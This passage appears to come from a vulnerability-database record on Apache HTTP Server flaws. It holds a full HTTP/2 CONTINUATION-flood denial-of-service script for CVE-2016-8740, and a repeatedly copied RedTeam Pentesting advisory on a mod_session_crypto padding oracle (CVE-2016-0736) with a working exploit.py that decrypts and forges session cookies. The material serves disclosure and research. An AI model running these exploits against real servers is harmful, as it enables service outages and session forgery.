release\r\n2016-12-20 Vendor released fixed version\r\n2016-12-23 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[1] https://github.com/mwielgoszewski/python-paddingoracle\r\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. 
The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40961/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.4.23 mod_http2 - Denial of Service", "edition": 1, "published": "2016-12-12T00:00:00", "title": "Apache 2.4.23 mod_http2 - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8740"], "modified": "2016-12-12T00:00:00", "id": "EXPLOITPACK:2666FB0676B4B582D689921651A30355", "href": "", "sourceData": "#!/usr/bin/python\n\n\"\"\" source : http://seclists.org/bugtraq/2016/Dec/3\nThe mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740)\n\nUsage : cve-2016-8740.py [HOST] [PORT]\n\"\"\"\n\nimport sys\nimport struct\nimport socket\n\nHOST = sys.argv[1]\nPORT = int(sys.argv[2])\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\n\n# https://http2.github.io/http2-spec/#ConnectionHeader\ns.sendall('PRI * HTTP/2.0\\r\\n\\r\\nSM\\r\\n\\r\\n')\n\n# https://http2.github.io/http2-spec/#SETTINGS\nSETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length\nSETTINGS += struct.pack('B', 0x04) # Type\nSETTINGS += struct.pack('B', 0x00)\nSETTINGS += struct.pack('>I', 0x00000000)\ns.sendall(SETTINGS)\n\n# https://http2.github.io/http2-spec/#HEADERS\nHEADER_BLOCK_FRAME = '\\x82\\x84\\x86\\x41\\x86\\xa0\\xe4\\x1d\\x13\\x9d\\x09\\x7a\\x88\\x25\\xb6\\x50\\xc3\\xab\\xb6\\x15\\xc1\\x53\\x03\\x2a\\x2f\\x2a\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\nHEADERS = struct.pack('>I', 
len(HEADER_BLOCK_FRAME))[1:] # Length\nHEADERS += struct.pack('B', 0x01) # Type\nHEADERS += struct.pack('B', 0x00) # Flags\nHEADERS += struct.pack('>I', 0x00000001) # Stream ID\ns.sendall(HEADERS + HEADER_BLOCK_FRAME)\n\n# Sending CONTINUATION frames for leaking memory\n# https://http2.github.io/http2-spec/#CONTINUATION\nwhile True:\n HEADER_BLOCK_FRAME = '\\x40\\x83\\x18\\xc6\\x3f\\x04\\x76\\x76\\x76\\x76'\n HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length\n HEADERS += struct.pack('B', 0x09) # Type\n HEADERS += struct.pack('B', 0x01) # Flags\n HEADERS += struct.pack('>I', 0x00000001) # Stream ID\n s.sendall(HEADERS + HEADER_BLOCK_FRAME)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_session_crypto - Padding Oracle", "edition": 1, "published": "2016-12-23T00:00:00", "title": "Apache mod_session_crypto - Padding Oracle", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "id": "EXPLOITPACK:DAED9B9E8D259B28BF72FC7FDC4755A7", "href": "", "sourceData": "'''\nAdvisory: Padding Oracle in Apache mod_session_crypto\n\nDuring a penetration test, RedTeam Pentesting discovered a Padding\nOracle vulnerability in mod_session_crypto of the Apache web server.\nThis vulnerability can be exploited to decrypt the session data and even\nencrypt attacker-specified data.\n\n\nDetails\n=======\n\nProduct: Apache HTTP Server mod_session_crypto\nAffected Versions: 2.3 to 2.5\nFixed Versions: 2.4.25\nVulnerability Type: Padding Oracle\nSecurity Risk: high\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\nVendor Status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\nAdvisory Status: published\nCVE: CVE-2016-0736\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\n\n\nIntroduction\n============\n\nThe module 
mod_session_crypto of the Apache HTTP Server can be used in\nconjunction with the modules mod_session and mod_session_cookie to store\nsession data in an encrypted cookie within the users' browsers. This\navoids server-side session state so that incoming HTTP requests can be\neasily distributed amongst a number of application web servers which do\nnot need to share session state.\n\n\nMore Details\n============\n\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\ndecrypt session data and uses mod_session to store the encrypted data in\na cookie (usually called \"session\") within the user's browser. The\ndecrypted session is then made available to the application in an\nenvironment variable (in case of a CGI script) or in a custom HTTP\nrequest header. The application can add a custom HTTP response header\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\nthe session's content with the value of the header. Detailed\ninstructions to set up mod_session and mod_session_crypto can be found\nin the documentation:\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\n\nThe module mod_session_crypto is configured to use either 3DES or AES\nwith various key sizes, defaulting to AES256. 
Encryption is handled by\nthe function \"encrypt_string\":\n\nmodules/session/mod_session_crypto.c\n------------------------------------------------------------------------\n/**\n * Encrypt the string given as per the current config.\n *\n * Returns APR_SUCCESS if successful.\n */\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\n session_crypto_dir_conf *dconf, const char *in, char **out)\n{\n[...]\n apr_crypto_key_t *key = NULL;\n[...]\n const unsigned char *iv = NULL;\n[...]\n\n /* use a uuid as a salt value, and prepend it to our result */\n apr_uuid_get(&salt);\n\n[...]\n\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\n strlen(passphrase),\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\n\n[...]\n\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\n[...]\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\n strlen(in), block);\n[...]\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\n[...]\n\n /* prepend the salt and the iv to the result */\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\n memcpy(combined, &salt, sizeof(apr_uuid_t));\n memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\n\n /* base64 encode the result */\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\n sizeof(apr_uuid_t) + 1)\n * sizeof(char));\n[...]\n return res;\n}\n------------------------------------------------------------------------\n\nThe source code shows that an encryption key is derived from the\nconfigured password and a randomly chosen salt by calling the function\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\nthe key. The data is then encrypted and the salt and IV prepended to the\nencrypted data. 
Before returning to the caller, the result is encoded as\nbase64.\n\nThis procedure does not guarantee integrity of the ciphertext, so the\nApache module is unable to detect whether a session sent back to the\nserver has been tampered with. Depending on the application this often\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\nThis allows decrypting the session and encrypting arbitrary data chosen\nby the attacker.\n\n\nProof of Concept\n================\n\nThe vulnerability can be reproduced as follows. First, the modules\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\nconfigured:\n\n------------------------------------------------------------------------\nSession On\nSessionEnv On\nSessionCookieName session path=/\nSessionHeader X-Replace-Session\nSessionCryptoPassphrase RedTeam\n------------------------------------------------------------------------\n\nIn addition, CGI scripts are enabled for a folder and the following CGI\nscript is saved as \"status.rb\" and is made available to clients:\n\n------------------------------------------------------------------------\n#!/usr/bin/env ruby\n\nrequire 'cgi'\n\ncgi = CGI.new\ndata = CGI.parse(ENV['HTTP_SESSION'])\n\nif data.has_key? 
'username'\n puts\n puts \"your username is %s\" % data['username']\n exit\nend\n\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\nputs\nputs \"not logged in\"\n------------------------------------------------------------------------\n\nOnce the CGI script is correctly set up, the command-line HTTP client curl\ncan be used to access it:\n\n------------------------------------------------------------------------\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\nHTTP/1.1 200 OK\nDate: Tue, 19 Jan 2016 13:23:19 GMT\nServer: Apache/2.4.10 (Ubuntu)\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\nCache-Control: no-cache\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\nTransfer-Encoding: chunked\nContent-Type: application/x-ruby\n\nnot logged in\n------------------------------------------------------------------------\n\nThe example shows that a new encrypted cookie with the name \"session\" is\nreturned, and the response body contains the text \"not logged in\".\nCalling the script again with the cookie just returned reveals that the\nusername in the session is set to \"guest\":\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\nhttp://127.0.0.1:8080/cgi-bin/status.rb\n\nyour username is guest\n------------------------------------------------------------------------\n\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\nthe padding at the end of the ciphertext, so the session cannot be\ndecrypted correctly and is therefore not passed to the CGI script, which\nreturns the text \"not logged in\" 
again:\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\nhttp://127.0.0.1:8080/cgi-bin/status.rb\n\nnot logged in\n------------------------------------------------------------------------\n\nThis verifies the existence of the Padding Oracle vulnerability. The\nPython library[1] python-paddingoracle was then used to implement\ndecrypting the session by exploiting the Padding Oracle vulnerability.\n\nexploit.py\n------------------------------------------------------------------------\n'''\n\nfrom paddingoracle import BadPaddingException, PaddingOracle\nfrom base64 import b64encode, b64decode\nimport requests\n\nclass PadBuster(PaddingOracle):\n def __init__(self, valid_cookie, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.wait = kwargs.get('wait', 2.0)\n self.valid_cookie = valid_cookie\n\n def oracle(self, data, **kwargs):\n v = b64encode(self.valid_cookie+data)\n\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\n\n if 'username' in response.content:\n logging.debug('No padding exception raised on %r', v)\n return\n\n raise BadPaddingException\n\nif __name__ == '__main__':\n import logging\n import sys\n\n if not sys.argv[2:]:\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\n sys.exit(1)\n\n logging.basicConfig(level=logging.WARN)\n mode = sys.argv[1]\n session = b64decode(sys.argv[2])\n padbuster = PadBuster(session)\n\n if mode == \"decrypt\":\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\n print('Decrypted session:\\n%r' % cookie)\n elif mode == \"encrypt\":\n key = session[0:16]\n plaintext = sys.argv[3]\n\n s = padbuster.encrypt(plaintext, block_size=16)\n\n data = b64encode(key+s[0:len(s)-16])\n print('Encrypted session:\\n%s' % data)\n else:\n print \"invalid mode\"\n sys.exit(1)\n\n'''\n------------------------------------------------------------------------\n\nThis Python script can then be used to decrypt the session:\n\n------------------------------------------------------------------------\n$ time python exploit.py decrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=\nDecrypted session:\nb'username=guest&timestamp=1453282205\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r\\r'\n\nreal 6m43.088s\nuser 0m15.464s\nsys 0m0.976s\n------------------------------------------------------------------------\n\nIn this sample application, the username and a timestamp are included in\nthe session data. The Python script can also be used to encrypt a new\nsession containing the username \"admin\":\n\n------------------------------------------------------------------------\n$ time python exploit.py encrypt sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4\\\nHztmf0CFsp1vpLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYB\\\nRU= username=admin\n\nEncrypted session:\nsxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7zmQ/GLFjF4pcXY\n\nreal3m38.002s\nusers0m8.536s\nsys0m0.512s\n\n------------------------------------------------------------------------\n\nSending this newly encrypted session to the server shows that the\nusername is now \"admin\":\n\n------------------------------------------------------------------------\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXPZQZNxCxjK938K9tufqX9xDLFciz7\\\nzmQ/GLFjF4pcXY http://127.0.0.1:8080/cgi-bin/status.rb\n\nyour username is admin\n------------------------------------------------------------------------\n\n\nWorkaround\n==========\n\nUse a different means to store the session, e.g. 
in a database by using\nmod_session_dbd.\n\n\nFix\n===\n\nUpdate to Apache HTTP version 2.4.25 (see [2]).\n\n\nSecurity Risk\n=============\n\nApplications which use mod_session_crypto usually store sensitive values\nin the session and rely on an attacker's inability to decrypt or modify\nthe session. Successful exploitation of the Padding Oracle vulnerability\nsubverts this mechanism and allows constructing sessions with arbitrary\nattacker-specified content. Depending on the application this may\ncompletely subvert the application's security. Therefore, this\nvulnerability poses a high risk.\n\n\nTimeline\n========\n\n2016-01-11 Vulnerability identified\n2016-01-12 Customer approved disclosure to vendor\n2016-01-12 CVE number requested\n2016-01-20 Vendor notified\n2016-01-22 Vendor confirmed the vulnerability\n2016-02-03 Vendor provided patch\n2016-02-04 Apache Security Team assigned CVE number\n2016-03-03 Requested status update from vendor, no response\n2016-05-02 Requested status update from vendor, no response\n2016-07-14 Requested status update and roadmap from vendor\n2016-07-21 Vendor confirms working on a new release and inquired whether the\n patch fixes the vulnerability\n2016-07-22 RedTeam confirms\n2016-08-24 Requested status update from vendor\n2016-08-29 Vendor states that there is no concrete timeline\n2016-12-05 Vendor announces a release\n2016-12-20 Vendor released fixed version\n2016-12-23 Advisory released\n\n\nReferences\n==========\n\n[1] https://github.com/mwielgoszewski/python-paddingoracle\n[2] http://httpd.apache.org/security/vulnerabilities_24.html\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests performed by a\nteam of specialised IT-security experts. 
Hereby, security weaknesses in\ncompany networks or products are uncovered and can be fixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity-related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at:\nhttps://www.redteam-pentesting.de/\n'''", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "myhack58": [{"lastseen": "2017-01-05T15:00:52", "bulletinFamily": "info", "cvelist": ["CVE-2016-0736"], "edition": 1, "description": "Recently, security researchers found a Padding Oracle vulnerability in the mod_session_crypto module of the Apache [Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>). An attacker can exploit this vulnerability to decrypt the session data, and even to encrypt attacker-specified data. \nVulnerability details\nProduct: Apache HTTP Server mod_session_crypto \nAffected versions: 2.3 to 2.5 \nFixed version: 2.4.25 \nVulnerability type: Padding Oracle \nSecurity risk: high \nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html \nVendor status: fixed version released\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt \nAdvisory status: published\nCVE: CVE-2016-0736 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736 \nIntroduction \nThe mod_session_crypto module of the Apache HTTP server can be used together with the mod_session and mod_session_cookie modules to store session data in encrypted cookies in the user's browser. This avoids server-side session state, so that incoming HTTP requests can easily be distributed across a number of application web servers that do not need to share session state. 
\nMore details\nThe mod_session_crypto module uses symmetric encryption to encrypt and decrypt session data, and uses mod_session to store the encrypted data in a cookie in the user's browser, usually called \u201csession\u201d. The decrypted session is then made available to the application in an environment variable or in a custom HTTP request header. The application can add a custom HTTP response header, usually \u201cX-Replace-Session\u201d, whose value the HTTP server uses to replace the session content. For the specific steps to set up mod_session and mod_session_crypto, please refer to the following document: \nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples \nThe mod_session_crypto module is configured to use either 3DES or AES with various key sizes; the default is AES256. The actual encryption is done by the function \u201cencrypt_string\u201d: \nmodules/session/mod_session_crypto.c \n/** \n* Encrypt the string given as per the current config. \n* \n* Returns APR_SUCCESS if successful. \n*/ \nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f, \nsession_crypto_dir_conf *dconf, const char *in, char **out) \n{ \n[...] \napr_crypto_key_t *key = NULL; \n[...] \nconst unsigned char *iv = NULL; \n[...] \n/* use a uuid as a salt value, and prepend it to our result */ \napr_uuid_get(&salt); \n[...] \nres = apr_crypto_passphrase(&key, &ivSize, passphrase, \nstrlen(passphrase), \n(unsigned char *) (&salt), sizeof(apr_uuid_t), \n*cipher, APR_MODE_CBC, 1, 4096, f, r->pool); \n[...] \nres = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool); \n[...] \nres = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in, \nstrlen(in), block); \n[...] \nres = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block); \n[...] 
\n/* prepend the salt and the iv to the result */ \ncombined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t)); \nmemcpy(combined, &salt, sizeof(apr_uuid_t)); \nmemcpy(combined + sizeof(apr_uuid_t), iv, ivSize); \nmemcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen); \n/* base64 encode the result */ \nbase64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen + \nsizeof(apr_uuid_t) + 1) \n* sizeof(char)); \n[...] \nreturn res; \n} \nThe source code shows that the encryption key is derived from the configured password and a randomly chosen salt by calling the function \u201capr_crypto_passphrase\u201d. This function internally uses PBKDF2 to derive the key. The data is then encrypted, and the salt and the IV are prepended to the encrypted data. Before returning, the function base64-encodes the result. \nSince this procedure does not guarantee the integrity of the ciphertext, the Apache module cannot detect whether a session sent back to the server has been tampered with. This often means that an attacker can carry out a Padding Oracle attack, i.e. decrypt the session and encrypt arbitrary attacker-specified data. \nProof-of-concept code (POC) \nBelow we reproduce the vulnerability. First, enable the modules mod_session, mod_session_crypto and mod_session_cookie and configure them as shown: \nSession On \nSessionEnv On \nSessionCookieName session path=/ \nSessionHeader X-Replace-Session \nSessionCryptoPassphrase RedTeam \nIn addition, enable CGI scripts for a folder and save the following CGI script there as \u201cstatus.rb\u201d, so that clients can access it: \n#!/usr/bin/env ruby \nrequire 'cgi' \n", "modified": "2017-01-05T00:00:00", "published": "2017-01-05T00:00:00", "id": "MYHACK58:62201782679", "href": "http://www.myhack58.com/Article/html/3/62/2017/82679.htm", "type": "myhack58", "title": "Apache-mod_session_crypto module in the Padding Oracle vulnerability analysis-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-19T03:14:20", "description": "Apache mod_session_crypto versions 2.3 through 2.5 suffer from a padding oracle vulnerability.", "edition": 1, "published": "2016-12-23T00:00:00", "type": "zdt", "title": "Apache mod_session_crypto - Padding Oracle Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0736"], "modified": "2016-12-23T00:00:00", "href": "https://0day.today/exploit/description/26574", "id": "1337DAY-ID-26574", "sourceData": "Padding Oracle in Apache mod_session_crypto\r\n\r\nDuring a penetration test, RedTeam Pentesting discovered a Padding\r\nOracle vulnerability in mod_session_crypto of the Apache web server.\r\nThis vulnerability can be exploited to decrypt the session data and even\r\nencrypt attacker-specified data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Apache HTTP Server mod_session_crypto\r\nAffected Versions: 2.3 to 2.5\r\nFixed Versions: 2.4.25\r\nVulnerability Type: Padding Oracle\r\nSecurity Risk: high\r\nVendor URL: https://httpd.apache.org/docs/trunk/mod/mod_session_crypto.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-001.txt\r\nAdvisory Status: published\r\nCVE: CVE-2016-0736\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0736\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nThe module mod_session_crypto of the Apache HTTP Server can be used in\r\nconjunction with the modules mod_session 
and mod_session_cookie to store\r\nsession data in an encrypted cookie within the users' browsers. This\r\navoids server-side session state so that incoming HTTP requests can be\r\neasily distributed amongst a number of application web servers which do\r\nnot need to share session state.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nThe module mod_session_crypto uses symmetric cryptography to encrypt and\r\ndecrypt session data and uses mod_session to store the encrypted data in\r\na cookie (usually called \"session\") within the user's browser. The\r\ndecrypted session is then made available to the application in an\r\nenvironment variable (in case of a CGI script) or in a custom HTTP\r\nrequest header. The application can add a custom HTTP response header\r\n(usually \"X-Replace-Session\") which instructs the HTTP server to replace\r\nthe session's content with the value of the header. Detailed\r\ninstructions to set up mod_session and mod_session_crypto can be found\r\nin the documentation:\r\nhttps://httpd.apache.org/docs/2.4/mod/mod_session.html#basicexamples\r\n\r\nThe module mod_session_crypto is configured to use either 3DES or AES\r\nwith various key sizes, defaulting to AES256. 
Encryption is handled by\r\nthe function \"encrypt_string\":\r\n\r\nmodules/session/mod_session_crypto.c\r\n------------------------------------------------------------------------\r\n/**\r\n * Encrypt the string given as per the current config.\r\n *\r\n * Returns APR_SUCCESS if successful.\r\n */\r\nstatic apr_status_t encrypt_string(request_rec * r, const apr_crypto_t *f,\r\n session_crypto_dir_conf *dconf, const char *in, char **out)\r\n{\r\n[...]\r\n apr_crypto_key_t *key = NULL;\r\n[...]\r\n const unsigned char *iv = NULL;\r\n[...]\r\n\r\n /* use a uuid as a salt value, and prepend it to our result */\r\n apr_uuid_get(&salt);\r\n\r\n[...]\r\n\r\n res = apr_crypto_passphrase(&key, &ivSize, passphrase,\r\n strlen(passphrase),\r\n (unsigned char *) (&salt), sizeof(apr_uuid_t),\r\n *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);\r\n\r\n[...]\r\n\r\n res = apr_crypto_block_encrypt_init(&block, &iv, key, &blockSize, r->pool);\r\n[...]\r\n res = apr_crypto_block_encrypt(&encrypt, &encryptlen, (unsigned char *)in,\r\n strlen(in), block);\r\n[...]\r\n res = apr_crypto_block_encrypt_finish(encrypt + encryptlen, &tlen, block);\r\n[...]\r\n\r\n /* prepend the salt and the iv to the result */\r\n combined = apr_palloc(r->pool, ivSize + encryptlen + sizeof(apr_uuid_t));\r\n memcpy(combined, &salt, sizeof(apr_uuid_t));\r\n memcpy(combined + sizeof(apr_uuid_t), iv, ivSize);\r\n memcpy(combined + sizeof(apr_uuid_t) + ivSize, encrypt, encryptlen);\r\n\r\n /* base64 encode the result */\r\n base64 = apr_palloc(r->pool, apr_base64_encode_len(ivSize + encryptlen +\r\n sizeof(apr_uuid_t) + 1)\r\n * sizeof(char));\r\n[...]\r\n return res;\r\n}\r\n------------------------------------------------------------------------\r\n\r\nThe source code shows that an encryption key is derived from the\r\nconfigured password and a randomly chosen salt by calling the function\r\n\"apr_crypto_passphrase\". This function internally uses PBKDF2 to derive\r\nthe key. 
The data is then encrypted and the salt and IV prepended to the\r\nencrypted data. Before returning to the caller, the result is encoded as\r\nbase64.\r\n\r\nThis procedure does not guarantee integrity of the ciphertext, so the\r\nApache module is unable to detect whether a session sent back to the\r\nserver has been tampered with. Depending on the application this often\r\nmeans that attackers are able to exploit a Padding Oracle vulnerability.\r\nThis allows decrypting the session and encrypting arbitrary data chosen\r\nby the attacker.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe vulnerability can be reproduced as follows. First, the modules\r\nmod_session, mod_session_crypto and mod_session_cookie are enabled and\r\nconfigured:\r\n\r\n------------------------------------------------------------------------\r\nSession On\r\nSessionEnv On\r\nSessionCookieName session path=/\r\nSessionHeader X-Replace-Session\r\nSessionCryptoPassphrase RedTeam\r\n------------------------------------------------------------------------\r\n\r\nIn addition, CGI scripts are enabled for a folder and the following CGI\r\nscript is saved as \"status.rb\" and is made available to clients:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env ruby\r\n\r\nrequire 'cgi'\r\n\r\ncgi = CGI.new\r\ndata = CGI.parse(ENV['HTTP_SESSION'])\r\n\r\nif data.has_key? 
'username'\r\n puts\r\n puts \"your username is %s\" % data['username']\r\n exit\r\nend\r\n\r\nputs \"X-Replace-Session: username=guest&timestamp=\" + Time.now.strftime(\"%s\")\r\nputs\r\nputs \"not logged in\"\r\n------------------------------------------------------------------------\r\n\r\nOnce the CGI script is correctly set up, the command-line HTTP client curl\r\ncan be used to access it:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -i http://127.0.0.1:8080/cgi-bin/status.rb\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Jan 2016 13:23:19 GMT\r\nServer: Apache/2.4.10 (Ubuntu)\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nCache-Control: no-cache\r\nSet-Cookie: session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vpLQ\r\n l1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU=;path=/\r\nTransfer-Encoding: chunked\r\nContent-Type: application/x-ruby\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThe example shows that a new encrypted cookie with the name \"session\" is\r\nreturned, and the response body contains the text \"not logged in\".\r\nCalling the script again with the cookie just returned reveals that the\r\nusername in the session is set to \"guest\":\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRU= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nyour username is guest\r\n------------------------------------------------------------------------\r\n\r\nSending a modified cookie ending in \"u=\" instead of \"U=\" will invalidate\r\nthe padding at the end of the ciphertext, so the session cannot be\r\ndecrypted correctly and is therefore not passed to the CGI script, which\r\nreturns the text \"not 
logged in\" again:\r\n\r\n------------------------------------------------------------------------\r\n$ curl -b session=sxGTJsP1TqiPrbKVM1GAXHla5xSbA/u4zH/4Hztmf0CFsp1vp\\\r\nLQl1DGPGMMyujJL/znsBkkf0f8cXLgNDgsGE9O7pbWnbaJS8JEKXZMYBRu= \\\r\nhttp://127.0.0.1:8080/cgi-bin/status.rb\r\n\r\nnot logged in\r\n------------------------------------------------------------------------\r\n\r\nThis verifies the existence of the Padding Oracle vulnerability. The\r\nPython library[1] python-paddingoracle was then used to implement\r\ndecrypting the session by exploiting the Padding Oracle vulnerability.\r\n\r\nexploit.py\r\n------------------------------------------------------------------------\r\nfrom paddingoracle import BadPaddingException, PaddingOracle\r\nfrom base64 import b64encode, b64decode\r\nimport requests\r\n\r\nclass PadBuster(PaddingOracle):\r\n def __init__(self, valid_cookie, **kwargs):\r\n super(PadBuster, self).__init__(**kwargs)\r\n self.wait = kwargs.get('wait', 2.0)\r\n self.valid_cookie = valid_cookie\r\n\r\n def oracle(self, data, **kwargs):\r\n v = b64encode(self.valid_cookie+data)\r\n\r\n response = requests.get('http://127.0.0.1:8080/cgi-bin/status.rb',\r\n cookies=dict(session=v), stream=False, timeout=5, verify=False)\r\n\r\n if 'username' in response.content:\r\n logging.debug('No padding exception raised on %r', v)\r\n return\r\n\r\n raise BadPaddingException\r\n\r\nif __name__ == '__main__':\r\n import logging\r\n import sys\r\n\r\n if not sys.argv[2:]:\r\n print 'Usage: [encrypt|decrypt] <session value> <plaintext>'\r\n sys.exit(1)\r\n\r\n logging.basicConfig(level=logging.WARN)\r\n mode = sys.argv[1]\r\n session = b64decode(sys.argv[2])\r\n padbuster = PadBuster(session)\r\n\r\n if mode == \"decrypt\":\r\n cookie = padbuster.decrypt(session[32:], block_size=16, iv=session[16:32])\r\n print('Decrypted session:\\n%r' % cookie)\r\n elif mode == \"encrypt\":\r\n key = session[0:16]\r\n plaintext = 